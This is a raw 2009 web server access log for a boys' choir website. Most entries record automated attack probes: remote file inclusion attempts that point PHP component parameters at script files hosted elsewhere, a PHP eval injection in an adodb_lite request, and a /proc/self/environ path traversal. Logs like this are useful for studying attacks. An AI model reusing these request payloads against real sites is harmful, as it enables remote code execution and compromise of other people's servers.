65.55.106.229 - - [04/Jul/2009:14:52:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
72.30.79.34 - - [04/Jul/2009:14:54:35 -0700] "GET /logs/?N=A HTTP/1.0" 200 1065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:59:05 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:59:05 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.51.133.202 - - [04/Jul/2009:14:59:05 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:15:01:59 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:15:01:59 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:15:02:00 -0700] "GET /logs/access_090517.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
217.147.29.190 - - [04/Jul/2009:15:02:10 -0700] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.223.143.131 - - [04/Jul/2009:15:05:19 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.223.143.131 - - [04/Jul/2009:15:05:19 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.223.143.131 - - [04/Jul/2009:15:05:19 -0700] "GET /logs/access.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.223.143.131 - - [04/Jul/2009:15:05:33 -0700] "GET /logs/access_090612.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.38.65.112 - - [04/Jul/2009:15:06:06 -0700] "GET /logs/access.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.38.65.112 - - [04/Jul/2009:15:06:06 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.38.65.112 - - [04/Jul/2009:15:06:06 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:15:06:40 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:15:06:40 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:15:06:40 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.38.65.112 - - [04/Jul/2009:15:06:41 -0700] "GET /logs/access_090612.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:15:07:22 -0700] "GET /logs/access_090626.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:15:07:37 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.186.87 - - [04/Jul/2009:15:16:47 -0700] "GET /logs/access.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:17:59 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:17:59 -0700] "GET /logs/access_090626.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:17:59 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:18:21 -0700] "GET /logs/access_090626.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:18:21 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:18:22 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:18:23 -0700] "GET /logs/access_090629.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.americanboyschoir.com"
216.75.60.116 - - [04/Jul/2009:15:18:38 -0700] "GET /logs/access_090629.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.americanboyschoir.com"
84.51.241.6 - - [04/Jul/2009:15:24:54 -0700] "GET /logs/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.51.241.6 - - [04/Jul/2009:15:24:55 -0700] "GET /logs/access.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.51.241.6 - - [04/Jul/2009:15:24:55 -0700] "GET /?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.51.241.6 - - [04/Jul/2009:15:25:24 -0700] "GET /logs/access_090612.log%20%20/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.223.143.131 - - [04/Jul/2009:15:34:10 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.223.143.131 - - [04/Jul/2009:15:35:25 -0700] "GET /logs/access_090626.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:15:38:24 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:15:38:24 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:15:38:24 -0700] "GET /logs/access_090629.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:15:40:32 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
117.121.208.254 - - [04/Jul/2009:15:42:00 -0700] "GET /logs/access_090213.log/errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.americanboyschoir.com"
117.121.208.254 - - [04/Jul/2009:15:42:07 -0700] "GET /errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.americanboyschoir.com"
117.121.208.254 - - [04/Jul/2009:15:42:13 -0700] "GET /logs/errors.php?error=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.americanboyschoir.com"
212.87.13.68 - - [04/Jul/2009:15:49:19 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.com/search?q=%22intitle:index+of%22+xxx+jpg&hl=pl&lr=&client=opera&rls=pl&start=10&sa=N" "Opera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1" "www.americanboyschoir.com"
212.87.13.68 - - [04/Jul/2009:15:49:20 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.americanboyschoir.com/xxx/" "Opera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:06 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:06 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:06 -0700] "GET /logs/access_090626.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
212.87.13.68 - - [04/Jul/2009:15:50:06 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Opera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:08 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:08 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:08 -0700] "GET /logs/access_090626.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:15 -0700] "GET /logs/access_090622.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:50:17 -0700] "GET /logs/access_090622.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:54:39 -0700] "GET /logs/access_090629.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:54:46 -0700] "GET /logs/access_090626.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:55:20 -0700] "GET /logs/access_090629.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:55:37 -0700] "GET /logs/access_090626.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:59:26 -0700] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:59:26 -0700] "GET /logs/access.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:15:59:26 -0700] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:00:36 -0700] "GET /logs/access.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:00:36 -0700] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:00:36 -0700] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.51.241.6 - - [04/Jul/2009:16:03:14 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:03:26 -0700] "GET /logs/access_090626.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.38.65.112 - - [04/Jul/2009:16:03:51 -0700] "GET /logs/access.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:04:19 -0700] "GET /logs/access_090626.log/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.51.241.6 - - [04/Jul/2009:16:04:39 -0700] "GET /logs/access_090626.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.38.65.112 - - [04/Jul/2009:16:06:08 -0700] "GET /logs/access_090626.log/?sourcedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.108.84.112 - - [04/Jul/2009:16:07:10 -0700] "GET /logs/access.log/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.108.84.112 - - [04/Jul/2009:16:07:10 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.108.84.112 - - [04/Jul/2009:16:07:11 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.108.84.112 - - [04/Jul/2009:16:11:14 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.108.84.112 - - [04/Jul/2009:16:11:14 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.110.50.110 - - [04/Jul/2009:16:11:45 -0700] "GET /logs/access.log/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.americanboyschoir.com"
78.110.50.110 - - [04/Jul/2009:16:11:46 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.americanboyschoir.com"
78.110.50.110 - - [04/Jul/2009:16:11:49 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.americanboyschoir.com"
66.232.143.238 - - [04/Jul/2009:16:16:14 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
66.232.143.238 - - [04/Jul/2009:16:16:14 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:17:08 -0700] "GET /components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:17:12 -0700] "GET /logs//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:17:12 -0700] "GET /logs//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:17:12 -0700] "GET /components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:17:12 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:17:13 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.110 - - [04/Jul/2009:16:18:42 -0700] "GET /logs/atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.americanboyschoir.com"
78.110.50.110 - - [04/Jul/2009:16:18:42 -0700] "GET /atom.php5?page=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:22:11 -0700] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:22:30 -0700] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:24:51 -0700] "GET /logs/access.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:25:04 -0700] "GET /logs/access.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:25:52 -0700] "GET /logs/access_090629.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:16:26:02 -0700] "GET /logs/access_090629.log//components/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:16:30:11 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:16:30:11 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:16:30:12 -0700] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
85.158.185.67 - - [04/Jul/2009:16:30:12 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:42:48 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:42:48 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:42:48 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:42:52 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:42:52 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
84.207.17.120 - - [04/Jul/2009:16:42:52 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.55.106.231 - - [04/Jul/2009:16:43:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.americanboyschoir.com"
91.195.124.16 - - [04/Jul/2009:16:50:41 -0700] "GET /logs/access.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.americanboyschoir.com"
